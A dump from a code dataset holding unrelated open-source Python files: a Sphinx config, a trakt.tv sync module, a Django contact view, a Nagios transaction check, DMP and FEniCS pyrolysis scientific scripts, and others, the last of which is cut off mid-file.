code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
from lib.models.basemodels import *
|
hzlf/openbroadcast
|
website/lib/models/__init__.py
|
Python
|
gpl-3.0
| 35
|
# -*- coding: utf-8 -*-
#
# Sphinx build configuration for the segraph documentation.
#
# Originally generated by sphinx-quickstart on Wed May 31 11:53:59 2017.
# This file is execfile()d with its containing directory as the current
# working directory.  Every configuration value has a default; the
# commented-out entries below simply document those defaults.
#
# If extensions (or modules to document with autodoc) live in another
# directory, add it to sys.path here (use os.path.abspath for paths that
# are relative to the documentation root):
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))


# -- General configuration ------------------------------------------------

# Minimal Sphinx version required, if any:
# needs_sphinx = '1.0'

# Sphinx extension modules, as strings (builtin 'sphinx.ext.*' or custom).
extensions = ['sphinx.ext.autodoc']

# Paths that contain templates, relative to this directory.
templates_path = ['_templates']

# Suffix(es) of source filenames; a list of strings is also accepted:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'segraph'
copyright = u'2017, Abhinandan Dubey'
author = u'Abhinandan Dubey'

# The short X.Y version and the full release string; these replace
# |version| and |release| throughout the built documents.
version = u'0.5'
release = u'0.5'

# Language for content autogenerated by Sphinx (also used when doing
# content translation via gettext catalogs; usually set on the command line).
language = None

# Patterns, relative to the source directory, of files and directories to
# ignore when looking for source files.  These also affect
# html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# Whether `todo` and `todoList` directives produce output.
todo_include_todos = False


# -- Options for HTML output ----------------------------------------------

# The (builtin) theme used for HTML and HTML Help pages.
html_theme = 'alabaster'

# Theme-specific look-and-feel options:
# html_theme_options = {}

# Paths holding custom static files (such as style sheets).  These are
# copied after the builtin static files, so a file named "default.css"
# here overrides the builtin "default.css".
html_static_path = ['_static']


# -- Options for HTMLHelp output ------------------------------------------

# Output file base name for the HTML help builder.
htmlhelp_basename = 'segraphdoc'


# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper'):
    # 'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt'):
    # 'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble:
    # 'preamble': '',

    # Latex figure (float) alignment:
    # 'figure_align': 'htbp',
}

# Grouping of the document tree into LaTeX files.  One tuple per file:
# (source start file, target name, title, author, documentclass).
latex_documents = [
    (master_doc, 'segraph.tex', u'segraph Documentation',
     u'Abhinandan Dubey', 'manual'),
]


# -- Options for manual page output ---------------------------------------

# One entry per manual page:
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'segraph', u'segraph Documentation',
     [author], 1)
]


# -- Options for Texinfo output -------------------------------------------

# One tuple per Texinfo file: (source start file, target name, title,
# author, dir menu entry, description, category).
texinfo_documents = [
    (master_doc, 'segraph', u'segraph Documentation',
     author, 'segraph', 'One line description of project.',
     'Miscellaneous'),
]
|
alivcor/segraph
|
docs/conf.py
|
Python
|
gpl-3.0
| 4,734
|
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 12 09:25:49 2013
@author: ozdemircili
"""
"""
Installation:
pip install clint
"""

from clint.textui import colored, indent, puts

# BUG FIX: converted the Python 2 `print` statement to the print() function
# so the example is valid syntax on Python 3 (and still works on Python 2).
print('Colored output ' + colored.yellow('pyt') + colored.blue('hon'))

'''Indent Example'''
# `indent` is a context manager: everything `puts` inside the block is
# prefixed with the (colored) quote string.
with indent(3, quote=colored.red(' >')):
    puts('indent01')
    puts('indent02')

with indent(3, quote=colored.green(' |')):
    puts('that`s some juicy indent')
    puts('isn\'t?')
|
ozdemircili/pycheat
|
pycheat/clint.py
|
Python
|
gpl-3.0
| 487
|
from zope.interface import Interface, Attribute
class IPengine(Interface):
    """Interface to a pengine (remote Prolog engine) thread on a server.

    Describes the client-side protocol object used to create, query and
    control a single pengine session.
    """
    id=Attribute("Identifier (session) of pengine interaction.")
    options=Attribute("Dictionary of stanadard options used in communications")
    alias=Attribute("Alias of the pengine or None.")
    def create(src):
        """Create a pengine, sending it a
        Prolog program as src."""
    def ask(src):
        """Perform a query (ask) for
        the first solution, if any."""
    def query(src):
        """Alias for ask."""
    def next(count):
        """Query the next count solutions."""
    def stop(count):
        """Stop searching for solutions."""
    def abort():
        """Abort execution."""
    def detroy():
        # NOTE(review): name is misspelled (presumably 'destroy') but is kept
        # because it is part of the published interface.
        """Destroy the pengine."""
    def prompt(term):
        """Called when a pengine wants some data."""
    def output(term):
        """Called when a pengine wants
        to send some output."""
    def falure():
        # NOTE(review): name is misspelled (presumably 'failure') but is kept
        # because it is part of the published interface.
        """Called when no solution is found."""
    def error(term):
        """Called when an error occurs."""
    def success(term, more):
        """Called when the pengine obtains a
        query result successfully."""
    def define_app(app):
        """Define an application"""
    def get_app(app):
        """Check if the application exists"""
    def get_property(name):
        """Get a property of the pengine by name."""
    def set_property(name, value):
        """Set property name of the pengine to
        value val."""
    def properties():
        """Enumerate properties as (name,value)
        of the pengine."""
    # Other useful methods will follow.
|
eugeneai/pengines
|
pengines/interfaces.py
|
Python
|
gpl-3.0
| 1,735
|
# Author: Dieter Blomme <dieterblomme@gmail.com>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
import time
from lib.dateutil import parser
import sickbeard
from sickbeard import logger
from sickbeard import db
from sickbeard import trakt
from sickbeard import search_queue
from common import WANTED, WAITING
class TraktSync:
    """
    A synchronizer for trakt.tv which keeps track of which episode has and hasn't been watched.
    """

    def __init__(self):
        # flag consulted externally to know whether a sync is currently running
        self.amActive = False

    def _use_me(self):
        """Return True when both trakt support and trakt syncing are enabled."""
        return sickbeard.USE_TRAKT and sickbeard.USE_TRAKT_SYNC

    def updateWatchedData(self):
        """Pull the watched-episode history from trakt.tv, record the watch
        times in the local DB, then chain into updateNextEpisodeData()."""
        self.amActive = True
        method = "users/me/history/episodes"
        response = trakt.sendData(method)
        if response is not False:
            changes = dict()
            myDB = db.DBConnection()
            for data in response:
                show_name = data["show"]["title"]
                show_id = data["show"]["ids"]["tvdb"]
                season = data["episode"]["season"]
                episode = data["episode"]["number"]
                watched = time.mktime(parser.parse(data["watched_at"]).timetuple())
                # only ever move the recorded watch time forward :
                cursor = myDB.action("UPDATE tv_episodes SET last_watched=? WHERE showid=? AND season=? AND episode=? AND (last_watched IS NULL OR last_watched < ?)", [watched, show_id, season, episode, watched])
                if cursor.rowcount > 0:
                    changes[show_name] = changes.get(show_name, 0) + 1
                    logger.log("Updated " + show_name + ", episode " + str(season) + "x" + str(episode) + " watched @ " + str(watched))
            message = "Watched episodes synchronization complete: "
            if (len(changes) == 0):
                message += "No changes detected."
            else:
                message += "Marked as watched "
                first = True
                for show_name in changes:
                    # BUG FIX: the separator used to be appended on the FIRST
                    # iteration instead of the subsequent ones, producing
                    # "Marked as watched , 3 episodes of X2 episodes of Y".
                    if not first:
                        message += ", "
                    first = False
                    message += str(changes[show_name]) + " episodes of " + show_name
            logger.log(message)
        else:
            logger.log("Watched episodes synchronization failed.")
        self.updateNextEpisodeData()

    def updateNextEpisodeData(self):
        """Rebuild the trakt_data table with the next episode to watch for
        every show (-1/-1 when nothing is left), then chain into
        updateEpisodesToAutoDownload()."""
        myDB = db.DBConnection()
        myDB.action("DELETE FROM trakt_data;")
        update_datetime = int(time.time())
        showList = list(sickbeard.showList)
        for show in showList:
            sqlResults = myDB.select("SELECT season, episode FROM v_episodes_to_watch where showid = ? order by season asc, episode asc limit 1", [show.tvdbid])
            if len(sqlResults) == 1:
                nextSeason = sqlResults[0]["season"]
                nextEpisode = sqlResults[0]["episode"]
            else:
                # nothing left to watch for this show :
                nextSeason = -1
                nextEpisode = -1
            myDB.action("INSERT INTO trakt_data(showid, next_season, next_episode, last_updated) VALUES(?, ?, ?, ?)", [show.tvdbid, nextSeason, nextEpisode, update_datetime])
        logger.log("Next episodes synchronization complete.")
        self.updateEpisodesToAutoDownload()

    def updateEpisodesToAutoDownload(self):
        """For every show with a stay_ahead policy, flip up to `stay_ahead`
        WAITING episodes (at or after the next episode to watch) to WANTED
        and queue them for manual search."""
        myDB = db.DBConnection()
        showList = list(sickbeard.showList)
        for show in showList:
            if show.stay_ahead > 0:
                sqlResults = myDB.select("SELECT season, episode, name FROM tv_episodes WHERE status = ? and episode_id IN (select ep.episode_id from tv_episodes ep left join trakt_data trakt on trakt.showid = ep.showid where ep.showid = ? AND ep.season > 0 AND ((trakt.next_season IS NULL) OR (trakt.next_season > -1 AND ((ep.season > trakt.next_season) OR (ep.season = trakt.next_season AND ep.episode >= trakt.next_episode)))) order by ep.season ASC, ep.episode ASC limit ?)", [WAITING, show.tvdbid, show.stay_ahead])
                if len(sqlResults) > 0:
                    myDB.action("UPDATE tv_episodes set status = ? where status = ? and episode_id IN (select ep.episode_id from tv_episodes ep left join trakt_data trakt on trakt.showid = ep.showid where ep.showid = ? AND ep.season > 0 AND ((trakt.next_season IS NULL) OR (trakt.next_season > -1 AND ((ep.season > trakt.next_season) OR (ep.season = trakt.next_season AND ep.episode >= trakt.next_episode)))) order by ep.season ASC, ep.episode ASC limit ?)", [WANTED, WAITING, show.tvdbid, show.stay_ahead])
                    for row in sqlResults:
                        ep = show.getEpisode(int(row["season"]), int(row["episode"]))
                        logger.log(show.name + ": Episode " + ep.prettyName() + " queued for download due to StayAhead policies.")
                        queue_item = search_queue.ManualSearchQueueItem(ep)
                        sickbeard.searchQueueScheduler.action.add_item(queue_item) #@UndefinedVariable
        logger.log("Synchronization complete.")
        self.amActive = False

    def run(self):
        """Scheduler entry point: kick off the full synchronization chain."""
        self.updateWatchedData()
|
Zelgadis87/Sick-Beard
|
sickbeard/traktSync.py
|
Python
|
gpl-3.0
| 5,813
|
'''
Created on 2014-02-13
A module that introduces a special class intended for station datasets (i.e. time-series only).
@author: Andre R. Erler, GPL v3
'''
# internal imports
from geodata.base import Dataset, Variable, Axis
from geodata.netcdf import DatasetNetCDF
## the basic station class, without any geographic information
class StationDataset(Dataset):
    '''
    A Dataset intended for station time-series data (usually one-dimensional)
    at a single location; carries an extra station-ID piece of meta data.
    '''

    def __init__(self, name=None, title=None, ID=None, varlist=None, atts=None, **kwargs):
        '''
        Initialize from a name and (optionally) a set of variables; kwargs are
        forwarded to the parent constructor to support multiple inheritance.
        Station Attributes:
          ID = @property # station ID
        Basic Attributes:
          name = @property # short name (links to name in atts)
          title = @property # descriptive name (links to name in atts)
          variables = dict() # dictionary holding Variable instances
          axes = dict() # dictionary holding Axis instances (inferred from Variables)
          atts = AttrDict() # dictionary containing global attributes / meta data
        '''
        super(StationDataset, self).__init__(name=name, title=title, varlist=varlist,
                                             atts=atts, **kwargs)
        # record the station ID, unless none was given and one already exists
        if ID is not None or 'ID' not in self.atts:
            self.atts['ID'] = ID

    @property
    def ID(self):
        ''' The station ID, usually an alphanumerical code. '''
        return self.atts['ID']

    @ID.setter
    def ID(self, ID):
        self.atts['ID'] = ID
## the NetCDF version of the station dataset
class StationNetCDF(StationDataset,DatasetNetCDF):
    '''
    A StationDataset, associated with a NetCDF file, inheriting the properties of DatasetNetCDF.
    WARNING: this class has not been tested!
    '''

    def __init__(self, name=None, title=None, ID=None, dataset=None, filelist=None, varlist=None, varatts=None,
                 atts=None, axes=None, multifile=False, check_override=None, folder='', mode='r', ncformat='NETCDF4',
                 squeeze=True):
        '''
        Create a Dataset from one or more NetCDF files; Variables are created from NetCDF variables.
        Station Attributes:
          ID = @property # station ID
        NetCDF Attributes:
          mode = 'r' # a string indicating whether read ('r') or write ('w') actions are intended/permitted
          datasets = [] # list of NetCDF datasets
          dataset = @property # shortcut to first element of self.datasets
          filelist = [] # files used to create datasets
        Basic Attributes:
          variables = dict() # dictionary holding Variable instances
          axes = dict() # dictionary holding Axis instances (inferred from Variables)
          atts = AttrDict() # dictionary containing global attributes / meta data
        '''
        # BUG FIX: the original call passed `self` twice positionally and
        # hard-coded every keyword argument to its default (name=None, ...),
        # silently discarding all constructor arguments; forward them instead.
        super(StationNetCDF,self).__init__(name=name, title=title, ID=ID, dataset=dataset,
                                           filelist=filelist, varlist=varlist, varatts=varatts,
                                           atts=atts, axes=axes, multifile=multifile,
                                           check_override=check_override, folder=folder,
                                           mode=mode, ncformat=ncformat, squeeze=squeeze)
|
aerler/GeoPy
|
src/geodata/station.py
|
Python
|
gpl-3.0
| 3,438
|
"""
Copyright (C) 2016 Travis DeWolf
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import numpy as np
import matplotlib.pyplot as plt
import pydmps
import pydmps.dmp_discrete
# load the recorded (2, T) trajectory for the digit "2" and shift it so the
# path starts at the origin :
y_des = np.load("2.npz")["arr_0"].T
y_des -= y_des[:, 0][:, None]

# test normal run
dmp = pydmps.dmp_discrete.DMPs_discrete(n_dmps=2, n_bfs=500, ay=np.ones(2) * 10.0)
# CLEANUP: removed the unused y_track / dy_track / ddy_track accumulators --
# the rollouts below return fresh arrays directly.
dmp.imitate_path(y_des=y_des)

# roll the DMP out at normal, slow and fast temporal scalings :
y_track_normal, _, _ = dmp.rollout(tau=1)
y_track_slow, _, _ = dmp.rollout(tau=0.1)
y_track_fast, _, _ = dmp.rollout(tau=4)

# overlay the three trajectories in the plane :
plt.figure(1, figsize=(6, 6))
plt.plot(y_track_normal[:, 0], y_track_normal[:, 1], "b", lw=2)
plt.plot(y_track_slow[:, 0], y_track_slow[:, 1], "--r", lw=2)
plt.plot(y_track_fast[:, 0], y_track_fast[:, 1], "--y", lw=2)
plt.legend(['Normal', 'Slow', 'Fast'])
plt.title("DMP system - draw number 2")
plt.axis("equal")
plt.xlim([-2, 2])
plt.ylim([-2, 2])

# per-component time series, one subplot per temporal scaling :
plt.figure(2)
plt.subplot(3, 1, 1)
plt.title("DMP system - draw number 2")
plt.plot(y_track_normal)
plt.ylabel('Normal')
plt.subplot(3, 1, 2)
plt.plot(y_track_slow)
plt.ylabel('Slow')
plt.subplot(3, 1, 3)
plt.plot(y_track_fast)
plt.ylabel('Fast')
plt.show()
|
studywolf/pydmps
|
examples/draw_number_2_temporal_scaling.py
|
Python
|
gpl-3.0
| 1,727
|
#!/usr/bin/env python3
# Count Active Transactions
import pymysql
def mainactions(args_list, configs, db_cur):
    """
    Nagios-style check: count the currently active & tracked transactions.

    Arguments:
      args_list : optional [warn, crit] threshold overrides (int-convertible)
      configs   : unused here; part of the common check signature
      db_cur    : DB-API cursor yielding dict-style rows

    Returns a (message, exit_code) tuple following the Nagios convention
    (0 OK, 1 WARNING, 2 CRITICAL, 3 UNKNOWN), with perfdata appended.
    """
    help_string='''
Usage:
* Default: Returns the number of currently opened & tracked transaction
Specify the Warning and Critical Thresholds as the next two
variables (or I'll use the default 50 100'''
    # default thresholds, overridden when exactly two args are supplied :
    warn, crit = 50, 100
    if len(args_list) == 2:
        warn, crit = int(args_list[0]), int(args_list[1])

    total_transactions_query = "select count(*) as count from trked_trans where active = true ;"
    try:
        db_cur.execute(total_transactions_query)
    except Exception as e:
        # query failed -> UNKNOWN; report zero transactions in the perfdata
        active_transactions = 0
        response_string = "UNKNOWN: MySQL Query Error " + str(e)
        response_code = 3
    else:
        active_transactions = db_cur.fetchone()["count"]
        if active_transactions > crit:
            response_string = "CRITICAL: Large Number of Transactions " + str(active_transactions)
            response_code = 2
        elif active_transactions > warn:
            response_string = "WARNING: Large Number of Transactions " + str(active_transactions)
            response_code = 1
        else:
            # number is okay
            response_string = "OK: Acceptable Number of Transactions " + str(active_transactions)
            response_code = 0

    # Nagios perfdata section (leading space before the metric is intentional) :
    perf_string = " | " + " , ".join([" active_transactions=" + str(active_transactions)])
    return (response_string + perf_string, response_code)
|
chalbersma/persist_transaction
|
perf/count_active_transactions.py
|
Python
|
gpl-3.0
| 1,679
|
from django.core.mail import send_mail
from django.shortcuts import redirect, render
# Create your views here.
from contact.forms import ContactForm
def contact(request):
    """
    Display and process the contact form.

    GET  : render the page with an unbound form.
    POST : validate; on success save the message, e-mail it, and redirect to
           the 'success' view; on failure re-render the page with the bound
           form so the user's input and field errors are preserved.
    """
    form_class = ContactForm
    # new logic!
    if request.method == 'POST':
        form = form_class(request.POST, request.FILES)
        if form.is_valid():
            contact_name = request.POST.get('Name', '')
            contact_email = request.POST.get('Email', '')
            form_content = request.POST.get('Message', '')
            form.save()
            # NOTE(review): using the visitor's address as the sender may be
            # rejected by strict SMTP setups; consider a fixed from-address.
            send_mail('Smallplex - new contact: %s' % contact_name, form_content, contact_email,
                      ['nosonwan@gmail.com'])
            return redirect('success')
        # BUG FIX: previously the form *class* was re-rendered on an invalid
        # POST, silently discarding the user's input and validation errors.
        return render(request, 'contact.html', {
            'form': form,
        })
    return render(request, 'contact.html', {
        'form': form_class,
    })
def success(request):
    """Render the confirmation page shown after the contact form is sent."""
    template_name = 'contact_form_sent.html'
    return render(request, template_name)
|
osonwanne/smallplexsites
|
contact/views.py
|
Python
|
gpl-3.0
| 932
|
from fenics import *
from time import time
from helper import *
import numpy as np
import matplotlib as mpl
# matplotlib configuration : serif fonts and LaTeX-rendered text.
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['legend.fontsize'] = 'medium'
mpl.rcParams['text.usetex'] = True
# BUG FIX: the preamble must be a raw string -- '\usepackage' begins a
# truncated \uXXXX escape and is a SyntaxError on Python 3.  The raw string
# has the same value the original had on Python 2.
mpl.rcParams['text.latex.preamble'] = [r'\usepackage[mathscr]{euscript}']
#mpl.rcParams['contour.negative_linestyle'] = 'solid'

# FEniCS form-compiler and plotting settings :
parameters['form_compiler']['quadrature_degree'] = 2
parameters['plotting_backend'] = 'matplotlib'
# physical constants :
R = 8.3144         # universal gas constant [J/(mol K)]
sigma = 5.67e-8    # Stefan-Boltzmann constant [W/(m^2 K^4)]
g_a = 9.80665      # gravitational acceleration [m/s^2]

# pre-exponential (Arrhenius) factor for wood (W), tar (r) and char + gas (av) :
A_W = 2.8e19
A_C = 1.3e10
A_r = 3.28e14

# activation energy for wood (W), tar (r) and char + gas (av) [J/mol] :
E_W = 242.4e3
E_C = 150.5e3
E_r = 196.5e3

# split reaction ratio between gas and char :
nu_g = 0.65
nu_C = 0.35

# enthalpy variation :
delta_h_W = 0.0
delta_h_C = -418.0e3
delta_h_r = -418.0e3

# heat capacity :
c_W = 2.3e3
c_A = 2.3e3
c_g = 1.8e3
c_C = 1.1e3
c_r = 1.1e3        # FIXME: missing for tar

mu = 3e-5          # gas viscosity
omega = 1.0        # emissivity
omega_s = 0.8      # surface emissivity of timber
h_c = 20           # convective heat transfer coefficient

# pore diameter (one entry per coordinate direction) :
d = as_vector([4e-5, 4e-5 ])

# permeability (per direction) :
B_W = as_vector([1e-14, 1e-11])
B_C = as_vector([5e-12, 5e-11])

# thermal conductivity (per direction) :
k_W = as_vector([10.5e-2, 25.5e-2])
k_C = as_vector([7.1e-2, 10.46e-2])
k_g = as_vector([25.77e-3, 25.77e-3])

# gravitational acceleration vector :
g = as_vector([0.0, -g_a])

# time parameters :
dt = 0.2           # time step
t0 = 0.0           # start time
t = t0             # current time
t1 = dt            # equilibrium time
tf = 31.0          # final time

# file output :
out_dir = './output/'
plt_dir = './images/'
#===============================================================================
# function space declarations :

# mesh variables :
tau = 1.0e-2       # width of the (square) domain
                   # NOTE(review): 'tau' is shadowed further down by the
                   # stabilization function of the same name; it is only used
                   # here for mesh construction.
dn = 24            # number of elements

# create a mesh :
p1 = Point(0.0, 0.0)                            # origin
p2 = Point(tau, tau)                            # x, y corner
mesh = RectangleMesh(p1, p2, dn, dn, "crossed") # a box to fill the void

# define finite elements spaces and build mixed space :
# BDM : H(div)-conforming (vector) velocity; DG0 : piecewise-constant pressure
# and densities; CG1 : continuous temperature.
BDMe = FiniteElement("BDM", mesh.ufl_cell(), 1)
DGe = FiniteElement("DG", mesh.ufl_cell(), 0)
DG2e = FiniteElement("DG", mesh.ufl_cell(), 2)   # NOTE(review): unused below
CGe = FiniteElement("CG", mesh.ufl_cell(), 1)
We = MixedElement([BDMe, DGe, DGe, DGe, DGe, CGe])
BDM = FunctionSpace(mesh, BDMe)
DG = FunctionSpace(mesh, DGe)
CG = FunctionSpace(mesh, CGe)
VCG = VectorFunctionSpace(mesh, 'CG', 1)
W = FunctionSpace(mesh, We)

# mesh variables :
n = FacetNormal(mesh)
h = CellSize(mesh)
V = CellVolume(mesh)

# define trial and test functions :
Phi = TestFunction(W)
dU = TrialFunction(W)
U = Function(W)      # current solution
U1 = Function(W)     # previous time-step solution

# get the individual functions; the BDM sub-element is a 2-vector, hence
# seven names for six sub-elements.
# NOTE(review): the unpacking below rebinds 'p1' (previously the mesh origin
# Point) to the previous pressure component -- the Point is no longer needed.
phi_x, phi_y, psi, xi, chi, zeta, beta = Phi
u, v, p, rho_W, rho_A, rho_C, T = U
u1, v1, p1, rho_W1, rho_A1, rho_C1, T1 = U1
phi = as_vector([phi_x, phi_y ])
U3 = as_vector([u, v ])
U31 = as_vector([u1, v1 ])
#===============================================================================
# empirical relations and balance laws :

# volume of solid (initial solid volume scaled by the remaining solid mass) :
def V_S(rho_W, rho_C, rho_A):
    return (rho_W + rho_C + rho_A) * V_S_0 / rho_W_0

# Arrhenius reaction-rate factor :
def K(T, A, E):
    return A * exp( - E / (R * T) )

# virgin wood reaction rate factor :
def K_W(T):
    return K(T, A_W, E_W)

# char and gas reaction rate factor :
def K_Cg(T):
    return K(T, A_C, E_C)

# tar reaction rate factor :
def K_r(T):
    return K(T, A_r, E_r)

# virgin wood reaction rate :
def r_W(rho_W, T):
    return K_W(T) * rho_W

# char and gas reaction rate :
def r_Cg(rho_A, T):
    return K_Cg(T) * rho_A

# tar reaction rate :
def r_r(rho_A, T):
    return K_r(T) * rho_A

# porosity (void fraction of a cell) :
def epsilon(rho_W, rho_C, rho_A, V):
    return (V - V_S(rho_W, rho_C, rho_A)) / V

# ratio of current solid mass to initial solid mass :
def eta(rho_W, rho_A):
    return (rho_A + rho_W) / rho_W_0

# diagonal thermal conductivity tensor: blend of wood, char and gas
# conductivities plus a radiative T^3 pore contribution :
def k(rho_W, rho_C, rho_A, T, V):
    k_v = + eta(rho_W, rho_A) * k_W \
          + (1 - eta(rho_W, rho_A)) * k_C \
          + epsilon(rho_W, rho_C, rho_A, V) * k_g \
          + sigma * T**3 * d / omega
    k_xx = k_v[0]
    k_yy = k_v[1]
    k_v = as_matrix([[k_xx, 0.0 ],
                     [0.0, k_yy]])
    return k_v

# gas density (ideal-gas law) :
def rho_g(p, T):
    return p * W_g / (R * T)

# diagonal inverse permeability tensor for the Darcy velocity;
# NOTE(review): this reads the *global* solution components p and T rather
# than taking them as parameters -- confirm this is intended.
def B_inv(rho_W, rho_A):
    B_v = + eta(rho_W, rho_A) * B_W \
          + (1 - eta(rho_W, rho_A)) * B_C
    B_inv_xx = -mu / (rho_g(p,T) * B_v[0] + DOLFIN_EPS)
    B_inv_yy = -mu / (rho_g(p,T) * B_v[1] + DOLFIN_EPS)
    B_v = as_matrix([[B_inv_xx, 0.0 ],
                     [0.0, B_inv_yy]])
    return B_v

# enthalpy variation due to chemical reactions :
def q_r(rho_W, rho_A, T):
    q_r_v = + K_W(T)*rho_W*(delta_h_W + (T - T_0)*(c_W - c_A)) \
            + K_Cg(T)*rho_A*(delta_h_C + (T - T_0)*(c_A - nu_C*c_C - nu_g*c_g)) \
            + K_r(T)*rho_A*(delta_h_r + (T - T_0)*(c_A - c_r))
    return q_r_v

# temperature flux boundary condition (radiation + convection to ambient) :
def kdTdn(T):
    return - omega_s * sigma * (T**4 - T_inf**4) - h_c * (T - T_inf)

# backward-difference time derivative :
def dudt(u,u1): return (u - u1) / dt

# intrinsic (SUPG stabilization) time parameter;
# NOTE(review): shadows the mesh-width variable 'tau' defined above.
def tau(u, v, k):
    order = 1
    # the Peclet number :
    Unorm = sqrt(dot(v, v) + DOLFIN_EPS)
    knorm = sqrt(dot(k, k) + DOLFIN_EPS)
    PE = Unorm * h / (2*knorm)
    # for linear elements :
    if order == 1:
        xi = 1/tanh(PE) - 1/PE
    # for quadratic elements :
    if order == 2:
        xi_1 = 0.5*(1/tanh(PE) - 2/PE)
        xi = ((3 + 3*PE*xi_1)*tanh(PE) - (3*PE + PE**2*xi_1)) \
             / ((2 - 3*xi_1*tanh(PE))*PE**2)
    # intrinsic time parameter :
    tau_n = h*xi / (2 * Unorm)
    return tau_n
#===============================================================================
# initial conditions :
T_0 = 300.0        # initial temperature
rho_W_0 = 400.0    # initial virgin-wood density
rho_A_0 = 0.0      # initial active-intermediate density
rho_C_0 = 0.0      # initial char density
V_S_0 = 0.4 * V    # initial solid volume per cell
p_0 = 8e3          # initial gas pressure
W_g = 2.897e-2     # FIXME: need molecular weight of gas
rho_g_0 = p_0 * W_g / (R * T_0)   # initial gas density (ideal-gas law)

# interpolate the constant initial values onto the sub-spaces :
U3i = interpolate(Constant((0.0,0.0)), BDM)
pi = interpolate(Constant(p_0), DG)
rho_Wi = interpolate(Constant(rho_W_0), DG)
rho_Ai = interpolate(Constant(rho_A_0), DG)
rho_Ci = interpolate(Constant(rho_C_0), DG)
Ti = interpolate(Constant(T_0), CG)

# assign initial values :
assign(U, [U3i, pi, rho_Wi, rho_Ai, rho_Ci, Ti])

#===============================================================================
# boundary conditions for temperature and gas density by proxy of pressure :
ff = FacetFunction('size_t', mesh, 0)
tol = 1e-6

# mark each exterior facet with an edge id using its outward normal :
# left = 1 ----2----
# top = 2 | 3
# right = 3 1 |
# bottom = 4 ----4----
# NOTE(review): a facet with outward normal +x is geometrically the *right*
# edge, so ids 1 and 3 appear swapped relative to the diagram; harmless here
# because ids 1-3 are all treated as 'ambient' below -- but confirm.
for f in facets(mesh):
    n_f = f.normal()
    if n_f.x() > tol and abs(n_f.y()) < tol and f.exterior():
        ff[f] = 1
    elif abs(n_f.x()) < tol and n_f.y() > tol and f.exterior():
        ff[f] = 2
    elif n_f.x() < tol and abs(n_f.y()) < tol and f.exterior():
        ff[f] = 3
    elif abs(n_f.x()) < tol and n_f.y() < tol and f.exterior():
        ff[f] = 4

# the new measure :
ds = Measure('ds', subdomain_data=ff)

# the ambient boundary (three of the four edges) :
dAmb = ds(1) + ds(2) + ds(3)

# boundary conditions :
T_inf = Constant(900.0) # ambient temperature
p_inf = Constant(p_0) # ambient gas pressure

# cellulosic fire curve (ISO-834) applied ambient temperature;
# only used by the commented-out boundary setups below.
class AmbientTemperature(Expression):
    # NOTE(review): legacy-DOLFIN Expression subclass; the base __init__ is
    # not invoked and 'element' is ignored -- confirm against the dolfin
    # version in use.
    def __init__(self, t, element=None):
        self.t = t   # current simulation time
    def eval(self, value, x):
        # hold the initial temperature until the equilibrium time t1, then
        # follow the ISO-834 cellulosic fire curve :
        if self.t < t1:
            value[0] = T_0
        else:
            value[0] = T_0 + 345*np.log10(8*self.t/60.0 + 1)

def entire_boundary(x, on_boundary):
    return on_boundary

# ambient temperature for natural Neumann boundary condition :
#T_inf = AmbientTemperature(t0, element=CGe)

# define a list of boundary condition objects for solver :
#bc_T_left = DirichletBC(W.sub(5), T_inf, ff, 1)
#bc_T_top = DirichletBC(W.sub(5), T_inf, ff, 2)
#bc_T_right = DirichletBC(W.sub(5), T_inf, ff, 3)
#bc_T_bottom = DirichletBC(W.sub(5), T_inf, ff, 4)
#bc_T = DirichletBC(W.sub(5), T_inf, entire_boundary)
#bcs = [bc_T_left, bc_T_top, bc_T_right, bc_T_bottom]
bcs = []   # all boundary conditions enter weakly through the forms above
#===============================================================================
# the variational formulation :

# midpoint values (Crank-Nicolson) :
ep1 = epsilon(rho_W1, rho_C1, rho_A1, V)
ep = epsilon(rho_W, rho_C, rho_A, V)
p_mid = 0.5 * (p + p1)
rho_g_mid = 0.5 * (ep*rho_g(p,T) + ep1*rho_g(p1,T1))
rho_W_mid = 0.5 * (rho_W + rho_W1)
rho_A_mid = 0.5 * (rho_A + rho_A1)
rho_C_mid = 0.5 * (rho_C + rho_C1)
T_mid = 0.5 * (T + T1)

# gas (Darcy) velocity residual, integrated by parts; the ambient pressure
# p_inf enters through the boundary term :
delta_U3 = + dot(U3, B_inv(rho_W_mid, rho_A_mid)*phi) * dx \
           + p_mid * div(phi) * dx \
           - p_inf * dot(phi, n) * ds \
           - dot(rho_g_mid*g, phi) * dx

# gas mass balance residual; gas is produced by the char+gas and tar
# reactions :
delta_rho_g = + dudt(ep*rho_g(p, T), ep1*rho_g(p1, T1)) * psi * dx \
              + div(U3) * psi * dx \
              - (+ nu_g*r_Cg(rho_A_mid, T_mid) \
                 + r_r(rho_A_mid, T_mid))*psi*dx

# virgin solid wood mass balance;
# NOTE(review): the reaction term uses T rather than T_mid, unlike the other
# balances -- confirm this asymmetry is intended.
